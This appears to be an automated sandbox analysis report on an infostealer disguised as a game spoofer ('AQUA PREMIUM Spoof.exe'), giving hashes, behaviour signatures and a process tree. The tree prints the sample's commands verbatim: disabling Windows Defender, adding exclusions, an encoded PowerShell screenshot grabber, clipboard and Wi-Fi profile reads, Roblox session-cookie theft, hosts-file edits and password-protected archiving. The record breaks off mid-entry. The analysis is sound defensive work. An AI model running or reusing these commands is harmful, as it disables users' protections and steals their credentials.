Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2024 09:01

General

  • Target

    AQUA PREMIUM Spoof.exe

  • Size

    5.9MB

  • MD5

    47911cfecd3dcd8b505235dd9b187992

  • SHA1

    9c874cead1208b3b77f0ae535d07522629e6e676

  • SHA256

    3aac1ef0cd3825fbb753199f1fe31430f4aba354cc4fb8e7db74b63ac8f7efdf

  • SHA512

    cac06ffeb06e83c2e0a4c98512dde8292c2800a35a4653621e6cdd2877293381ebf7f773456974b4181838e98916ff9a6c6d5ec2ec145398cfddbb2668889eec

  • SSDEEP

    98304:V2De7pzWqe8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDtFMai3lMmg8N:VzNzWKB6yA+KO0WR4iarmg8N

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe
    "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe
      "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1956
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4544
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4448
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4104
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3604
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:4824
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3232
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:3624
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:908
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:2680
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3620
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:368
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:1784
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"
              4⤵
              • Views/modifies file attributes
              PID:4248
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:668
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4816
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:644
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1508
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1520
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:3456
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1688
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:4060
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:5048
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:8
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:3840
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:4108
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:4020
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1204
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:4244
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:3216
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:3320
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:1468
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:4188
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:1452
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:3764
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2252
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\grsjam1a\grsjam1a.cmdline"
                                5⤵
                                  PID:1568
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBAF.tmp" "c:\Users\Admin\AppData\Local\Temp\grsjam1a\CSC15AD2832CD304B50BD1D4DB7EEA0BCA.TMP"
                                    6⤵
                                      PID:2788
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:4544
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:1756
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                    3⤵
                                      PID:3324
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        4⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:736
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:5072
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1952
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:4168
                                            • C:\Windows\system32\attrib.exe
                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:4452
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:3224
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:5104
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                3⤵
                                                  PID:3648
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    4⤵
                                                    • Enumerates processes with tasklist
                                                    PID:1280
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:2136
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:2736
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:2732
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4720
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:1628
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2260
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:512
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3712
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:1760
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
                                                                    PID:2408
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\k7XzJ.zip" *"
                                                                  3⤵
                                                                    PID:2152
                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\k7XzJ.zip" *
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:2680
                                                                  • C:\Windows\system32\cmd.exe
